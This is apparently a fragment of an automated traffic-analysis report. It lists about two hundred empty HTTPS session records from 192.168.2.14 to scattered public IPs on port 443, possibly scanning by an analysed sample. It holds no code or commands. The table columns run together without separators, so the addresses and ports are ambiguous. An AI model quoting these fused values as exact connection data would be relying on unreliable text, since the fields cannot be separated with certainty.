                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17765192.168.2.145845254.113.201.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17766192.168.2.144369484.92.44.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17767192.168.2.144499412.230.204.30443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17768192.168.2.1454144123.145.197.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17769192.168.2.143447636.57.148.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17770192.168.2.1460180129.35.58.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17771192.168.2.14449001.245.159.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17772192.168.2.1437632146.244.16.166443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17773192.168.2.145790843.29.191.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17774192.168.2.1439146153.234.1.253443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17775192.168.2.1438404203.78.199.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17776192.168.2.144366440.138.143.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17777192.168.2.1460028121.97.201.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17778192.168.2.1434092174.52.38.173443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17779192.168.2.144468468.102.214.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17780192.168.2.1433764199.7.25.167443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17781192.168.2.1441396174.151.59.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17782192.168.2.1454028132.187.121.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17783192.168.2.143398642.209.97.28443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17784192.168.2.1433932157.7.232.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17785192.168.2.1435070171.203.98.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17786192.168.2.144000051.246.161.135443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17787192.168.2.1460278111.62.125.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17788192.168.2.1452604158.20.203.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17789192.168.2.1456290189.222.138.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17790192.168.2.1434520209.62.213.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17791192.168.2.144935839.164.179.60443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17792192.168.2.1440824153.101.25.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17793192.168.2.14377365.237.230.53443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17794192.168.2.1446738200.208.130.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17795192.168.2.143325875.197.21.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17796192.168.2.144204018.4.254.238443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17797192.168.2.1444076169.195.192.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17798192.168.2.143407042.200.90.141443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17799192.168.2.144167218.212.158.193443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17800192.168.2.1444190131.172.217.191443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17801192.168.2.143586019.101.145.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17802192.168.2.1440998167.145.87.234443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17803192.168.2.143959669.231.115.40443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17804192.168.2.1440068200.200.103.34443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17805192.168.2.1443416140.111.140.127443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17806192.168.2.145044052.164.116.21443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17807192.168.2.143979097.123.173.72443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17808192.168.2.1433192117.202.106.125443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17809192.168.2.145750225.253.42.50443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17810192.168.2.1438104141.248.36.168443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17811192.168.2.1445048120.113.218.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17812192.168.2.143525067.57.34.244443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17813192.168.2.1458112110.87.3.174443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17814192.168.2.144448098.239.61.0443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17815192.168.2.1442632198.34.61.175443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17816192.168.2.143552814.236.234.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17817192.168.2.1433208194.124.102.133443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17818192.168.2.144392612.226.205.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17819192.168.2.143647438.93.216.245443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17820192.168.2.1452800164.32.66.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17821192.168.2.143584254.146.74.161443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17822192.168.2.1456600198.254.113.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17823192.168.2.143875839.169.153.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17824192.168.2.1435296219.45.125.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17825192.168.2.144991242.35.19.101443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17826192.168.2.144304299.202.225.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17827192.168.2.1451336184.13.204.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17828192.168.2.1441774116.79.96.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17829192.168.2.1447970136.228.103.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17830192.168.2.144416873.211.38.89443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17831192.168.2.1447320207.253.197.255443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17832192.168.2.1450542137.97.30.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17833192.168.2.143364864.183.217.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17834192.168.2.1450708186.183.166.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17835192.168.2.1446522160.229.231.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17836192.168.2.1453202212.22.17.7443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17837192.168.2.14451468.163.165.136443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17838192.168.2.144422845.106.180.243443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17839192.168.2.145421824.208.224.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17840192.168.2.145703086.54.179.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17841192.168.2.14376805.73.26.178443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17842192.168.2.145667883.3.252.111443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17843192.168.2.14516709.252.7.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17844192.168.2.143623685.210.9.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17845192.168.2.1454460145.72.109.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17846192.168.2.1459544131.97.79.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17847192.168.2.1439376222.175.168.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17848192.168.2.144988643.4.59.146443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17849192.168.2.144594614.119.9.24443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17850192.168.2.144058275.240.247.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17851192.168.2.144861084.126.44.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17852192.168.2.1446690196.87.146.80443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17853192.168.2.1439254198.189.35.58443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17854192.168.2.1438598108.68.141.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17855192.168.2.145132698.95.90.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17856192.168.2.1446378139.148.250.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17857192.168.2.1451860197.73.59.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17858192.168.2.1456074189.110.186.205443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17859192.168.2.144058212.104.88.237443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17860192.168.2.1437796220.103.138.73443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17861192.168.2.1437442107.143.186.204443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17862192.168.2.1457900159.65.176.88443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17863192.168.2.14350902.152.190.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17864192.168.2.14455942.218.165.94443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17865192.168.2.1442528188.142.83.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17866192.168.2.144028057.241.190.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17867192.168.2.144273078.64.170.203443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17868192.168.2.145947238.13.62.225443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17869192.168.2.1443886120.196.173.163443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17870192.168.2.1445518212.135.224.100443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17871192.168.2.1439928143.228.56.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17872192.168.2.1457866176.219.70.54443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17873192.168.2.145163652.226.111.254443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17874192.168.2.1437300173.169.83.2443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17875192.168.2.14463689.163.139.131443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17876192.168.2.1454858156.106.215.123443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17877192.168.2.1441148207.106.244.59443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17878192.168.2.1435516166.40.31.20443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17879192.168.2.1458402131.239.26.109443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17880192.168.2.1432894198.245.121.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17881192.168.2.1457386130.26.73.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17882192.168.2.1446434116.20.215.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17883192.168.2.144537465.96.115.61443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17884192.168.2.1434470158.220.228.160443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17885192.168.2.1460938169.196.197.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17886192.168.2.144065059.116.23.218443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17887192.168.2.143845289.192.224.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17888192.168.2.1439266205.169.39.144443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17889192.168.2.143287483.233.211.171443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17890192.168.2.145428498.39.252.246443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17891192.168.2.1459522221.66.197.52443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17892192.168.2.1452912158.160.103.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17893192.168.2.1435628220.105.148.62443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17894192.168.2.144906872.76.113.35443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17895192.168.2.145535649.77.147.14443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17896192.168.2.1459436150.214.61.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17897192.168.2.1449994154.214.99.37443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17898192.168.2.1453334107.59.138.170443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17899192.168.2.144026019.245.41.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17900192.168.2.1451826182.100.158.242443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17901192.168.2.143875438.162.112.121443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17902192.168.2.146089860.135.8.228443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17903192.168.2.1457648150.74.89.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17904192.168.2.1460026136.103.76.118443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17905192.168.2.145193834.27.227.134443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17906192.168.2.1435240193.96.81.1443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17907192.168.2.1454570170.3.254.240443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17908192.168.2.144801851.215.49.184443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17909192.168.2.1455784108.71.97.86443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17910192.168.2.144055696.32.35.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17911192.168.2.1434632166.187.7.143443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17912192.168.2.1455194129.68.65.152443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17913192.168.2.143819241.70.98.129443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17914192.168.2.1460480181.224.206.23443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17915192.168.2.1453010104.104.170.185443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17916192.168.2.143529245.37.155.3443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17917192.168.2.1439540129.153.216.98443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17918192.168.2.1446134158.221.19.236443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17919192.168.2.1439992157.230.172.201443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17920192.168.2.143609670.153.131.107443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17921192.168.2.1440246117.26.221.164443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17922192.168.2.1448706203.173.134.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17923192.168.2.1434562100.37.143.12443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17924192.168.2.1441782207.77.95.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17925192.168.2.1433224202.29.239.5443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17926192.168.2.1455850193.138.118.231443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17927192.168.2.14564604.69.77.57443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17928192.168.2.143326250.3.241.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17929192.168.2.144802266.134.20.32443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17930192.168.2.1447206165.71.129.151443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17931192.168.2.143836258.215.229.147443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17932192.168.2.1438492103.142.118.180443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17933192.168.2.1457292145.203.18.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17934192.168.2.1440622210.137.125.117443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17935192.168.2.1455330129.202.160.142443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17936192.168.2.143284887.240.78.39443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17937192.168.2.145928449.181.25.227443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17938192.168.2.143738668.24.203.217443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17939192.168.2.145414894.208.131.148443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17940192.168.2.1436748189.254.248.46443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17941192.168.2.145172891.232.172.224443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17942192.168.2.1449268158.57.225.214443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17943192.168.2.1443486191.208.116.197443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17944192.168.2.1446766179.28.60.213443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17945192.168.2.1434898121.71.92.215443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17946192.168.2.14508544.142.8.190443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17947192.168.2.143516627.76.175.19443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17948192.168.2.1451184201.37.59.97443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17949192.168.2.144135060.220.51.229443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17950192.168.2.1437366122.171.218.145443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17951192.168.2.1446766217.8.75.239443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17952192.168.2.145661275.162.111.181443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17953192.168.2.1444128119.78.237.188443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17954192.168.2.144271662.219.130.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17955192.168.2.145042678.206.167.91443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17956192.168.2.144145217.243.235.165443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17957192.168.2.1459892200.116.7.41443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17958192.168.2.1439522155.170.24.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17959192.168.2.1443652166.164.40.251443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17960192.168.2.145729831.60.40.189443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17961192.168.2.1455272169.210.252.93443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17962192.168.2.1435144107.104.64.177443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17963192.168.2.144485665.58.159.223443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17964192.168.2.1438062118.104.56.56443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17965192.168.2.143894013.170.203.250443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17966192.168.2.143760254.63.236.139443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17967192.168.2.143758671.27.100.66443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17968192.168.2.1438414221.212.79.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17969192.168.2.1439076192.226.231.187443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17970192.168.2.143963666.186.175.172443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17971192.168.2.1442132205.50.62.49443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17972192.168.2.144976682.168.113.198443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17973192.168.2.145564282.32.89.113443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17974192.168.2.1460770106.142.187.65443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17975192.168.2.145937274.240.74.186443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        17976192.168.2.1439542159.165.241.150443
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
